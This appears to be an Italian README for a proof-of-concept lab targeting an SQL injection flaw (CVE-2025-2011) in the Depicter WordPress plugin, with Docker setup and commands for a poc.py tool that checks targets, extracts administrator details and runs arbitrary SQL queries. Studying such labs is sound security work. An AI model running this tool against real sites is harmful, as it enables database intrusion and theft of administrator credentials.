
PoC per CVE-2025-2011 - SQLi nel plugin Depicter <= 3.6.1
Riferimento CVE: CVE-2025-2011
Questa repository contiene un ambiente proof-of-concept per testare la vulnerabilità SQL injection nel plugin Depicter Slider & Popup Builder (versioni < 3.6.2).
requests, coloramaAvvia l'Ambiente
docker-compose up -d
Completa l'Installazione di WordPress
http://localhost:5555Installa il Plugin Vulnerabile
chmod +x install-plugin.sh
./install-plugin.sh
Questo script:
Installa le Dipendenze Python
pip install requests colorama
Lo script PoC (poc.py) può essere utilizzato per testare la vulnerabilità in diverse modalità:
Verifica se il target è vulnerabile
python poc.py -u http://localhost:5555
Estrai i dettagli dell'amministratore
python poc.py -u http://localhost:5555 -m admin
Esegui una query SQL personalizzata
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
Abilita l'output di debug
python poc.py -u http://localhost:5555 -d
Per arrestare e rimuovere l'ambiente:
docker-compose down -v
Questo ambiente è fornito esclusivamente a scopo educativo e di test. Non utilizzarlo contro alcun sistema senza esplicita autorizzazione.